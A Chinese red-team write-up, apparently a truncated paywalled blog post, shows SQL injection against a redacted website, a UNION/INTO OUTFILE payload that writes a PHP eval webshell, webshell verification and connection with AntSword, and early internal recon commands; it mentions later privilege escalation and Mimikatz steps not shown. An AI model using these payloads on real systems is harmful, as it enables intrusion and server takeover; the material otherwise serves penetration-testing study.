前言
网络安全的本质:懂进攻,知防守,先正向,后逆向。
本篇文章目录

网络拓扑图:
本次红队攻防实战所需绘制的拓扑图如下:

边界突破
访问网站:
http://xxx.xxx.xxx/?id=1
首页如下:

SQL注入拿shell
构造payload:and 1=1显示正确,and 1=2显示错误,说明存在SQL注入,并且爆出绝对路径

使用常用的注入函数into outfile 将一句话木马写入自动创建的 xxx.php文件中
http://xxx.xxx.xxx/?id=1 and 1=2 union select 1,'<?php @eval($_REQUEST[xxx]);?>' into outfile 'x:\\xxx\\xxx\\xxx.php'
需要有写入权限和上一步爆出的绝对路径

验证上传的木马是否成功,成功写入木马
http://xxx.xxx.xxx/xxx.php?xxx=phpinfo();

成功利用蚁剑拿到shell

2000多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图
内网信息收集
whoami
发现是普通用户的权限

ipconfig /all
查看用户的IP信息,可以看到位于工作组环境

route print
查看路由,通往10.0.1网段

本文详细介绍了红队攻防过程中,如何通过SQL注入获取shell,利用内网信息收集和提权技巧逐步深入,直至拿下域控主机。涉及SQL注入、Potato提权、reGeorg内网穿透、Mimikatz等工具的使用。
最低0.47元/天 解锁文章
911





